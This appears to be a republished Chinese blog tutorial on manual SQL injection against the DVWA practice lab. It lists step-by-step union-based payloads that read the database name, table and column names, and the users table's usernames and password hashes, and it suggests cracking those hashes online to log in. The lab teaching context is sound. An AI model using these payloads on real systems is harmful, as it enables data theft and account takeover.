初探sql注入
Posted 暗夜技术分享
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了初探sql注入相关的知识,希望对你有一定的参考价值。
dvwa low手工注入测试
ps:使用的靶场是dvwa,重在分享思路!
https://github.com/digininja/DVWA
原理: 一般来说,用户传入的数据不能直接在sql语句中运行,
服务器期望的是只得到传入的数据,而不是执行更加深入的语句
而当通过手工注入的时候,发现注入的错误语句被执行了,说明
程序允许更高级的语句通过程序运行,所以我们就可以使用更高级
的语句让程序执行
注入的方式:
1:错误的盲注:输入 ' 查看是否报错
2:基于布尔表达式的注入:判断是数字型的还是字符型的
and 1=1 -- (--空格)
3:基于时间的盲注 :and sleep(时间) 4:使用sqlmap等自动化工具进行注入
手工注入的步奏:
1:判断是否含有漏洞 。
1'
1' and 1=1 -- 和 ' and 1=2 -- ' 两者输出不同
1' and '1'='1' --
2:猜测查询数据库的字段数
1' group by 2 --
3:确认当前数据库名称和版本号,同时也是验证字段数确实为2
' union select database(),version() --
4:获取这个数据库中的表名,使用sql系统函数 (3)
1' union select 1,group_concat(table_name)
from information_schema.tables wher table_schema=database() --
获得大量的表名。
5:根据表名获得的字段名(4)
1' union select 1,group_concat(column_name)
from information_schema.columns where table_name='users' --
6:根据字段名查询数据(*5)
1' union select user,password from users --
7:根据查询到的用户名和密码进行登录,对于加密密码可以到cmd5网站进行撞库破解
音乐分享
本期的音乐是 十年
长
按
关
注
W先生
qq : 465879857
一起寻找生命中的光.....
AUT UMN
创作不易,转发点赞是对我的最好鼓励!
以上是关于初探sql注入的主要内容,如果未能解决你的问题,请参考以下文章
安全测试 web安全测试 常规安全漏洞 可能存在SQL和JS注入漏洞场景分析。为什么自己没有找到漏洞,哪么可能存在漏洞场景是?SQL注入漏洞修复 JS注入漏洞修复 漏洞存在场景分析和修复示例(代码片段